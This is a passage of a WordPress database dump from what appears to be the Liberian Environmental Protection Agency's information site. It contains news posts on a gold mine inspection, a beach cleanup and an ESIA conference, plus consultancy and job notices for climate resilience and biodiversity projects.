Facility ( TSF), waste rock dump, landfill site, onsite Laboratory, Processing Plant, emulsion plant, chemical warehouse and kinjor open pit. The next stop is Ndablama.</p>\n<!-- /wp:paragraph -->','A Team of EPA Technicians Conducted a Comprehensive Environmental Monitoring of the New Liberty Gold Mines in Kinjor, Grand Capemount County','','publish','open','closed','','a-team-of-epa-technicians-conducted-a-comprehensive-environmental-monitoring-of-the-new-liberty-gold-mines-in-kinjor-grand-capemount-county','','','2022-05-09 15:57:53','2022-05-09 15:57:53','',0,'https://ekmsliberia.info/?p=4709',121,'post','',0),(4710,42,'2022-05-09 15:57:35','2022-05-09 15:57:35','','epa technicians','','inherit','open','closed','','epa-technicians','','','2022-05-09 15:57:35','2022-05-09 15:57:35','',4709,'https://ekmsliberia.info/wp-content/uploads/2022/05/epa-technicians.png',0,'attachment','image/png',0),(4711,42,'2022-05-09 15:57:51','2022-05-09 15:57:51','<!-- wp:paragraph -->\n<p>A team of EPA technicians today April 14, 2022 conducted a comprehensive Environmental Monitoring of the New Liberty Gold Mines in Kinjor, Grand Capemount County to ensure Environmental compliance… During the visit, the team inspected the Tailing Storage Facility ( TSF), waste rock dump, landfill site, onsite Laboratory, Processing Plant, emulsion plant, chemical warehouse and kinjor open pit. The next stop is Ndablama.</p>\n<!-- /wp:paragraph -->','A Team of EPA Technicians Conducted a Comprehensive Environmental Monitoring of the New Liberty Gold Mines in Kinjor, Grand Capemount County','','inherit','closed','closed','','4709-revision-v1','','','2022-05-09 15:57:51','2022-05-09 15:57:51','',4709,'https://ekmsliberia.info/?p=4711',0,'revision','',0),(4712,42,'2022-04-23 15:58:00','2022-04-23 15:58:00','<!-- wp:paragraph -->\n<p>EPA in collaboration with Conservation International on 23 April 2022 held a Beach Cleanup exercise in several communities around Catholic Hospital Community in Sinkor. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"We will work closely with all partners to ensure that the private sector is supported effectively in recycling plastic waste.\" Prof. Wilson K. Tarpeh, Executive Director, Environment Protection Agency - EPA during the ongoing beach cleanup in Catholic and Sophie Communities as part of the BlueOceansLiberia Programme.</p>\n<!-- /wp:paragraph -->','EPA & CI Hold a Beach Cleanup Around Catholic Hospital Community in Sinkor','','publish','open','closed','','epa-ci-hold-a-beach-cleanup-around-catholic-hospital-community-in-sinkor','','','2022-05-09 16:04:53','2022-05-09 16:04:53','',0,'https://ekmsliberia.info/?p=4712',120,'post','',0),(4713,42,'2022-05-09 16:04:24','2022-05-09 16:04:24','','beach cleanup','','inherit','open','closed','','untitled-6','','','2022-05-09 16:04:40','2022-05-09 16:04:40','',4712,'https://ekmsliberia.info/wp-content/uploads/2022/05/Untitled.png',0,'attachment','image/png',0),(4714,42,'2022-05-09 16:04:52','2022-05-09 16:04:52','<!-- wp:paragraph -->\n<p>EPA in collaboration with Conservation International on 23 April 2022 held a Beach Cleanup exercise in several communities around Catholic Hospital Community in Sinkor. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"We will work closely with all partners to ensure that the private sector is supported effectively in recycling plastic waste.\" Prof. Wilson K. Tarpeh, Executive Director, Environment Protection Agency - EPA during the ongoing beach cleanup in Catholic and Sophie Communities as part of the BlueOceansLiberia Programme.</p>\n<!-- /wp:paragraph -->','EPA & CI Hold a Beach Cleanup Around Catholic Hospital Community in Sinkor','','inherit','closed','closed','','4712-revision-v1','','','2022-05-09 16:04:52','2022-05-09 16:04:52','',4712,'https://ekmsliberia.info/?p=4714',0,'revision','',0),(4716,42,'2022-05-18 14:43:17','2022-05-18 14:43:17','','Consultancy Service for Design','','inherit','open','closed','','consultancy-service-for-design','','','2022-05-18 14:43:17','2022-05-18 14:43:17','',0,'https://ekmsliberia.info/wp-content/uploads/2022/05/Consultancy-Service-for-Design.pdf',0,'attachment','application/pdf',0),(4717,42,'2022-05-02 14:44:24','2022-05-02 14:44:24','<span id=\"page3R_mcid39\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The main objective of the design consultancy work is to prepare the typical designs of civil </span><span dir=\"ltr\" role=\"presentation\">structure of a standard Laboratories and Research Center that replicate the identity of EPA </span><span dir=\"ltr\" role=\"presentation\">and the nature they served and in consultation with the guidelines of responsible government </span><span dir=\"ltr\" role=\"presentation\">authorities.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Consultancy-Service-for-Design.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy Service for the Design of Civil Structure of a Standard Laboratories and Research Center','','publish','closed','closed','','consultancy-service-for-the-design-of-civil-structure-of-a-standard-laboratories-and-research-center','','','2022-05-18 14:48:32','2022-05-18 14:48:32','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4717',84,'ekms_bulletin','',0),(4718,42,'2022-05-18 14:48:32','2022-05-18 14:48:32','<span id=\"page3R_mcid39\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The main objective of the design consultancy work is to prepare the typical designs of civil </span><span dir=\"ltr\" role=\"presentation\">structure of a standard Laboratories and Research Center that replicate the identity of EPA </span><span dir=\"ltr\" role=\"presentation\">and the nature they served and in consultation with the guidelines of responsible government </span><span dir=\"ltr\" role=\"presentation\">authorities.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Consultancy-Service-for-Design.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy Service for the Design of Civil Structure of a Standard Laboratories and Research Center','','inherit','closed','closed','','4717-revision-v1','','','2022-05-18 14:48:32','2022-05-18 14:48:32','',4717,'https://ekmsliberia.info/?p=4718',0,'revision','',0),(4719,42,'2022-05-03 14:12:53','2022-05-03 14:12:53','<span id=\"page3R_mcid25\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise </span><span dir=\"ltr\" role=\"presentation\">and the increased frequency of high</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">intensity storms. This has resulted in coastal erosion and </span><span dir=\"ltr\" role=\"presentation\">shoreline retreat, which threatens the sustainability of ecosy</span><span dir=\"ltr\" role=\"presentation\">stem services and directly impacts </span><span dir=\"ltr\" role=\"presentation\">Monrovians\' fishery</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">based livelihoods of approximately 55,000 Monrovians, 46% of whom are </span><span dir=\"ltr\" role=\"presentation\">women. </span></span><span id=\"page3R_mcid26\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilien</span><span dir=\"ltr\" role=\"presentation\">ce Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia (GoL).</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span></span><span id=\"page19R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Libe</span><span dir=\"ltr\" role=\"presentation\">ria by both addressing immediate adaptation priorities and </span><span dir=\"ltr\" role=\"presentation\">creating an enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of </span><span dir=\"ltr\" role=\"presentation\">Monrovia and Liberia.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Samuels-for-posting.pdf\" target=\"_blank\" rel=\"noopener\">International Firm/Company Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Develop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','publish','closed','closed','','consultancy-notice-for-international-firm-company-to-develop-terms-of-reference-tors-for-coastal-services-under-the-mmcrp','','','2022-05-19 14:17:05','2022-05-19 14:17:05','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4719',83,'ekms_bulletin','',0),(4720,42,'2022-05-19 14:14:46','2022-05-19 14:14:46','','MMCRP Consultancy','','inherit','open','closed','','samuels-for-posting','','','2022-05-19 14:15:01','2022-05-19 14:15:01','',0,'https://ekmsliberia.info/wp-content/uploads/2022/05/Samuels-for-posting.pdf',0,'attachment','application/pdf',0),(4721,42,'2022-05-19 14:17:05','2022-05-19 14:17:05','<span id=\"page3R_mcid25\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise </span><span dir=\"ltr\" role=\"presentation\">and the increased frequency of high</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">intensity storms. This has resulted in coastal erosion and </span><span dir=\"ltr\" role=\"presentation\">shoreline retreat, which threatens the sustainability of ecosy</span><span dir=\"ltr\" role=\"presentation\">stem services and directly impacts </span><span dir=\"ltr\" role=\"presentation\">Monrovians\' fishery</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">based livelihoods of approximately 55,000 Monrovians, 46% of whom are </span><span dir=\"ltr\" role=\"presentation\">women. </span></span><span id=\"page3R_mcid26\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilien</span><span dir=\"ltr\" role=\"presentation\">ce Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia (GoL).</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span></span><span id=\"page19R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">Libe</span><span dir=\"ltr\" role=\"presentation\">ria by both addressing immediate adaptation priorities and </span><span dir=\"ltr\" role=\"presentation\">creating an enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of </span><span dir=\"ltr\" role=\"presentation\">Monrovia and Liberia.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Samuels-for-posting.pdf\" target=\"_blank\" rel=\"noopener\">International Firm/Company Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy Notice for International Firm/Company to Develop Terms of Reference (ToRs) for Coastal Services Under the MMCRP','','inherit','closed','closed','','4719-revision-v1','','','2022-05-19 14:17:05','2022-05-19 14:17:05','',4719,'https://ekmsliberia.info/?p=4721',0,'revision','',0),(4722,42,'2022-05-19 14:24:23','2022-05-19 14:24:23','<!-- wp:paragraph -->\n<p>The International Association for Impact Assessment (IAIA) recently concluded a six-day international Conference and training on Environmental and Social Impact Assessment (ESIA). The conference was held in Vancouver, British Columbia, Canada for over 80 member states’ ESIA practitioners from across the world. The EPA Liberia, through its Assistant Manager for Environmental and Social Impacts Assessmen<em>t</em>, Mr. Daoda Socrates Carlon represented the EPA and earned a professional certificate in ESIA Leadership, after successfully completing a 3-day intensive training course.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The event, which ran from 02 May-07 May 2022 was intended to strengthen policies, partnerships, and participation in ESIA regimes/legislation around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The forum highlighted the significance of relevant stakeholders’ inclusion in Environmental Impact Assessment, case studies from other countries’ ESIA regimes, challenges, and progress made towards impact assessment, networking sessions with major international organizations, including the World Bank’s session on its environmental policy and expectations. The Forum also highlighted technical presentations of research works, field visits, presentation of awards, and training course sessions on different areas of concentration in ESIA, mentorship sessions for undergraduate university students, and many more.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Mr. Carlon, the training enhanced his understanding on the complex issues of environmental impact assessment and the EPA is on the right trajectory on its ESIA regime for the fact the EPA was able to develop and publish the ESIA 2021 revised fees regime, 2022 ESIA procedural Guidelines and Schedule, and the completion of the two (02) weeks intensive training and certification of ESIA Practitioners in Liberia before attending the IAIA’s 41<sup>st</sup> Conference in Canada. Besides, the EPA has also developed six other regulations to enhance the sustainable management of the environment and the natural resources therein.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Besides his participation, Mr. alluded that EPA was far ahead of many Sub-Saharan African countries in its ESIA regime and this was also alluded to by the Netherlands Commission on Environmental Impact Assessment’s delegate. The training was more of a knowledge sharing for me, based on my expertise, experience, and the numerous game we made over the years at the EPA, Mr. Carlon stressed. As a result, many delegates pledged to nominate the EPA Liberia for the Corporate Initiative Award meant for private or public sector companies for a specific activity or project that has made a notable contribution to responsible development practice through the application of impact assessment in next year’s IAIA’s convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also provided a platform for sharing knowledge and information on ESIA activities at the national, sub-national, regional, and trans-boundary levels; thus contributing to national capacities to conform to the good practices of ESIA administration, by ensuring all IAIA’s practitioners or members adhere to the IAIA’s Code of Ethics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of the training, the IAIA’s President, Marla Orenstein reminded participants of the role in the administration of ESIA and promised that the organization is always available as a resource center for all members. The head of the British Columbia Environmental Assessment Office in Canada also welcomed participants and appreciated the IAIA for choosing Canada as a venture and pledged his office support to host participants on their beautiful lands to promote the exchange of ideas, while ensuring the successful completion of the conference.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He commended IAIA for monstering the courage to host the conference in person after three years of delay due to COVID-19 and expressed his hope that the workshop will further provide considerable insight on how ESIA can be used as a practical tool for the sustainable management of the environment and its related natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the training conference, field visits were made to different historical sites in Canada, while participants also received certificates in different areas of concentration.</p>\n<!-- /wp:paragraph -->','EPA Attends IAIA’s 41st Training Conference on ESIA in Vancouver, British Columbia, Canada','','publish','open','closed','','epa-attends-iaias-41st-training-conference-on-esia-in-vancouver-british-columbia-canada','','','2022-05-19 14:24:25','2022-05-19 14:24:25','',0,'https://ekmsliberia.info/?p=4722',119,'post','',0),(4723,42,'2022-05-19 14:24:02','2022-05-19 14:24:02','','ESIA','','inherit','open','closed','','esia-2','','','2022-05-19 14:24:02','2022-05-19 14:24:02','',4722,'https://ekmsliberia.info/wp-content/uploads/2022/05/ESIA.png',0,'attachment','image/png',0),(4724,42,'2022-05-19 14:24:23','2022-05-19 14:24:23','<!-- wp:paragraph -->\n<p>The International Association for Impact Assessment (IAIA) recently concluded a six-day international Conference and training on Environmental and Social Impact Assessment (ESIA). The conference was held in Vancouver, British Columbia, Canada for over 80 member states’ ESIA practitioners from across the world. The EPA Liberia, through its Assistant Manager for Environmental and Social Impacts Assessmen<em>t</em>, Mr. Daoda Socrates Carlon represented the EPA and earned a professional certificate in ESIA Leadership, after successfully completing a 3-day intensive training course.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The event, which ran from 02 May-07 May 2022 was intended to strengthen policies, partnerships, and participation in ESIA regimes/legislation around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The forum highlighted the significance of relevant stakeholders’ inclusion in Environmental Impact Assessment, case studies from other countries’ ESIA regimes, challenges, and progress made towards impact assessment, networking sessions with major international organizations, including the World Bank’s session on its environmental policy and expectations. The Forum also highlighted technical presentations of research works, field visits, presentation of awards, and training course sessions on different areas of concentration in ESIA, mentorship sessions for undergraduate university students, and many more.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Mr. Carlon, the training enhanced his understanding on the complex issues of environmental impact assessment and the EPA is on the right trajectory on its ESIA regime for the fact the EPA was able to develop and publish the ESIA 2021 revised fees regime, 2022 ESIA procedural Guidelines and Schedule, and the completion of the two (02) weeks intensive training and certification of ESIA Practitioners in Liberia before attending the IAIA’s 41<sup>st</sup> Conference in Canada. Besides, the EPA has also developed six other regulations to enhance the sustainable management of the environment and the natural resources therein.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Besides his participation, Mr. alluded that EPA was far ahead of many Sub-Saharan African countries in its ESIA regime and this was also alluded to by the Netherlands Commission on Environmental Impact Assessment’s delegate. The training was more of a knowledge sharing for me, based on my expertise, experience, and the numerous game we made over the years at the EPA, Mr. Carlon stressed. As a result, many delegates pledged to nominate the EPA Liberia for the Corporate Initiative Award meant for private or public sector companies for a specific activity or project that has made a notable contribution to responsible development practice through the application of impact assessment in next year’s IAIA’s convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training also provided a platform for sharing knowledge and information on ESIA activities at the national, sub-national, regional, and trans-boundary levels; thus contributing to national capacities to conform to the good practices of ESIA administration, by ensuring all IAIA’s practitioners or members adhere to the IAIA’s Code of Ethics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the start of the training, the IAIA’s President, Marla Orenstein reminded participants of the role in the administration of ESIA and promised that the organization is always available as a resource center for all members. The head of the British Columbia Environmental Assessment Office in Canada also welcomed participants and appreciated the IAIA for choosing Canada as a venture and pledged his office support to host participants on their beautiful lands to promote the exchange of ideas, while ensuring the successful completion of the conference.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He commended IAIA for monstering the courage to host the conference in person after three years of delay due to COVID-19 and expressed his hope that the workshop will further provide considerable insight on how ESIA can be used as a practical tool for the sustainable management of the environment and its related natural resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the end of the training conference, field visits were made to different historical sites in Canada, while participants also received certificates in different areas of concentration.</p>\n<!-- /wp:paragraph -->','EPA Attends IAIA’s 41st Training Conference on ESIA in Vancouver, British Columbia, Canada','','inherit','closed','closed','','4722-revision-v1','','','2022-05-19 14:24:23','2022-05-19 14:24:23','',4722,'https://ekmsliberia.info/?p=4724',0,'revision','',0),(4725,42,'2022-05-20 10:18:26','2022-05-20 10:18:26','This Climate Change Gender Action Plan (ccGAP) for Liberia was prepared based on the desk review of key reports, publications and websites, surveys and interviews, in-country meetings, stakeholder consultation and research, among others.\n\nThe development of this document was made possible largely due to the generous financial support received from the Government of Finland. Their visionary leadership has built the necessary momentum for a global paradigm shift in our understanding of the importance of gender in climate change negotiations and initiatives globally, and for the betterment of the lives of women around the world.','Climate Change Gender Action Plan','','inherit','closed','closed','','2063-autosave-v1','','','2022-05-20 10:18:26','2022-05-20 10:18:26','',2063,'https://ekmsliberia.info/?p=4725',0,'revision','',0),(4726,42,'2022-05-20 10:19:45','2022-05-20 10:19:45','This Climate Change Gender Action Plan (ccGAP) for Liberia was prepared based on the desk review of key reports, publications and websites, surveys and interviews, in-country meetings, stakeholder consultation and research, among others.\r\n\r\nThe development of this document was made possible largely due to the generous financial support received from the Government of Finland. Their visionary leadership has built the necessary momentum for a global paradigm shift in our understanding of the importance of gender in climate change negotiations and initiatives globally, and for the betterment of the lives of women around the world.','Climate Change Gender Action Plan','','inherit','closed','closed','','2063-revision-v1','','','2022-05-20 10:19:45','2022-05-20 10:19:45','',2063,'https://ekmsliberia.info/?p=4726',0,'revision','',0),(4729,42,'2022-05-30 16:07:48','2022-05-30 16:07:48','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program intends to support the Government of Liberia to Consolidate studies on Liberia’s Biodiversity and National Biodiversity Repository developed.\r\n\r\nThe National Biodiversity Strategy and Action Plan (NBSAP) has the current biodiversity status, the threats leading to its degradation and the strategies and priority actions to ensure its conservation and sustainable use within the framework of the socio-economic development of the country. The overall goal, speciﬁc objectives and strategies which form the foundation of the Strategy and Action Plan attempt to address the range of issues relevant to the management of biodiversity, from the development and implementation of a national biodiversity policy to research requirements for speciﬁc species.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Updated-ToR-NBR.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy to Support the Consolidation of Studies on Liberia’s Biodiversity and National Biodiversity Repository','','publish','closed','closed','','consultancy-to-support-the-consolidation-of-studies-on-liberias-biodiversity-and-national-biodiversity-repository','','','2022-05-30 16:07:48','2022-05-30 16:07:48','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4729',82,'ekms_bulletin','',0),(4730,42,'2022-05-30 16:04:37','2022-05-30 16:04:37','','ToR plastics innovation challenge Grant','','inherit','open','closed','','tor-plastics-innovation-challenge-grant','','','2022-05-30 16:04:37','2022-05-30 16:04:37','',0,'https://ekmsliberia.info/wp-content/uploads/2022/05/ToR-plastics-innovation-challenge-Grant.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4731,42,'2022-05-30 16:04:47','2022-05-30 16:04:47','','Updated ToR NBR','','inherit','open','closed','','updated-tor-nbr','','','2022-05-30 16:04:47','2022-05-30 16:04:47','',0,'https://ekmsliberia.info/wp-content/uploads/2022/05/Updated-ToR-NBR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(4732,42,'2022-05-30 16:07:48','2022-05-30 16:07:48','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program intends to support the Government of Liberia to Consolidate studies on Liberia’s Biodiversity and National Biodiversity Repository developed.\r\n\r\nThe National Biodiversity Strategy and Action Plan (NBSAP) has the current biodiversity status, the threats leading to its degradation and the strategies and priority actions to ensure its conservation and sustainable use within the framework of the socio-economic development of the country. The overall goal, speciﬁc objectives and strategies which form the foundation of the Strategy and Action Plan attempt to address the range of issues relevant to the management of biodiversity, from the development and implementation of a national biodiversity policy to research requirements for speciﬁc species.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/Updated-ToR-NBR.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></em></strong>\r\n\r\n&nbsp;','Consultancy to Support the Consolidation of Studies on Liberia’s Biodiversity and National Biodiversity Repository','','inherit','closed','closed','','4729-revision-v1','','','2022-05-30 16:07:48','2022-05-30 16:07:48','',4729,'https://ekmsliberia.info/?p=4732',0,'revision','',0),(4733,42,'2022-05-30 16:12:08','2022-05-30 16:12:08','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) intends to support the Government of Liberia to establish an Innovation Fund for Micro, Medium and Small-Scale Enterprises (MSMEs) to access grant for innovative waste recovery and sustainable waste management practices through the submission of proposals with innovative solutions to tackle the problems of solid waste/plastics. Innovation funds (also called seed funds or activation funds) are small granting funds used to jump start innovation, collaboration and self-organizing in networks. They have proven to be one of the most effective strategies for high impact networks, giving people on the ground a chance to initiate action that they believe will make a difference and often leveraging many new resources as a result of their successes.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/ToR-plastics-innovation-challenge-Grant.docx\" target=\"_blank\" rel=\"noopener\">Call for Proposal</a></em></strong>','Call for Proposals (Material & Recovery) to Access Grant for Micro, Medium and Small Scale Enterprises (MSMES)','','publish','closed','closed','','call-for-proposals-material-recovery-to-access-grant-for-micro-medium-and-small-scale-enterprises-msmes','','','2022-05-30 16:12:08','2022-05-30 16:12:08','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4733',81,'ekms_bulletin','',0),(4734,42,'2022-05-30 16:12:08','2022-05-30 16:12:08','The Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) intends to support the Government of Liberia to establish an Innovation Fund for Micro, Medium and Small-Scale Enterprises (MSMEs) to access grant for innovative waste recovery and sustainable waste management practices through the submission of proposals with innovative solutions to tackle the problems of solid waste/plastics. Innovation funds (also called seed funds or activation funds) are small granting funds used to jump start innovation, collaboration and self-organizing in networks. They have proven to be one of the most effective strategies for high impact networks, giving people on the ground a chance to initiate action that they believe will make a difference and often leveraging many new resources as a result of their successes.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/05/ToR-plastics-innovation-challenge-Grant.docx\" target=\"_blank\" rel=\"noopener\">Call for Proposal</a></em></strong>','Call for Proposals (Material & Recovery) to Access Grant for Micro, Medium and Small Scale Enterprises (MSMES)','','inherit','closed','closed','','4733-revision-v1','','','2022-05-30 16:12:08','2022-05-30 16:12:08','',4733,'https://ekmsliberia.info/?p=4734',0,'revision','',0),(4738,42,'2022-06-22 09:43:32','2022-06-22 09:43:32','<span id=\"page18R_mcid4\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia</span> <span dir=\"ltr\" role=\"presentation\">(EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP or Project), financed by the Green Climate Fund </span><span dir=\"ltr\" role=\"presentation\">(GCF), the United Nations Development Program (UNDP) and the Government of Liberia (GoL). </span><span dir=\"ltr\" role=\"presentation\">The core aim of the Proj</span><span dir=\"ltr\" role=\"presentation\">ect is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span><span dir=\"ltr\" role=\"presentation\">Liberia by both addressing immediate adaptation priorities and creating an enabling environment </span><span dir=\"ltr\" role=\"presentation\">for up scaling coastal adaptation initiatives to other parts of Monrovia and Liberia.</span> <span dir=\"ltr\" role=\"presentation\">This will be </span><span dir=\"ltr\" role=\"presentation\">done through interventions in three inter</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">related focus areas: i) coastal protection; ii) coastal</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">diversified</span> <span dir=\"ltr\" role=\"presentation\">climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihoods.</span> <span dir=\"ltr\" role=\"presentation\">The</span> <span dir=\"ltr\" role=\"presentation\">Project</span> <span dir=\"ltr\" role=\"presentation\">includes</span> <span dir=\"ltr\" role=\"presentation\">an </span><span dir=\"ltr\" role=\"presentation\">infrastructure component for the construction a rock rev</span><span dir=\"ltr\" role=\"presentation\">etment to protect West Point against coastal </span><span dir=\"ltr\" role=\"presentation\">erosion and storms. The Project will run from 26 June 2021 to 25 June 2026.\r\n</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/06/TOR-for-Monitoring-Evaluation-Officer-final-draft-Randa-Reviewed.pdf\" target=\"_blank\" rel=\"noopener\">M&amp;E Officer Wanted</a></strong></em>','Monitoring & Evaluation Officer Needed for Monrovia Metropolitan Climate Resilience Project','','publish','closed','closed','','monitoring-evaluation-officer-needed-for-monrovia-metropolitan-climate-resilience-project','','','2022-06-22 09:43:32','2022-06-22 09:43:32','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4738',80,'ekms_bulletin','',0),(4739,42,'2022-06-22 09:42:35','2022-06-22 09:42:35','','TOR for Monitoring & Evaluation Officer-final draft-Randa Reviewed','','inherit','open','closed','','tor-for-monitoring-evaluation-officer-final-draft-randa-reviewed','','','2022-06-22 09:42:35','2022-06-22 09:42:35','',0,'https://ekmsliberia.info/wp-content/uploads/2022/06/TOR-for-Monitoring-Evaluation-Officer-final-draft-Randa-Reviewed.pdf',0,'attachment','application/pdf',0),(4740,42,'2022-06-22 09:43:32','2022-06-22 09:43:32','<span id=\"page18R_mcid4\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia</span> <span dir=\"ltr\" role=\"presentation\">(EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP or Project), financed by the Green Climate Fund </span><span dir=\"ltr\" role=\"presentation\">(GCF), the United Nations Development Program (UNDP) and the Government of Liberia (GoL). </span><span dir=\"ltr\" role=\"presentation\">The core aim of the Proj</span><span dir=\"ltr\" role=\"presentation\">ect is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span><span dir=\"ltr\" role=\"presentation\">Liberia by both addressing immediate adaptation priorities and creating an enabling environment </span><span dir=\"ltr\" role=\"presentation\">for up scaling coastal adaptation initiatives to other parts of Monrovia and Liberia.</span> <span dir=\"ltr\" role=\"presentation\">This will be </span><span dir=\"ltr\" role=\"presentation\">done through interventions in three inter</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">related focus areas: i) coastal protection; ii) coastal</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">diversified</span> <span dir=\"ltr\" role=\"presentation\">climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">resilient</span> <span 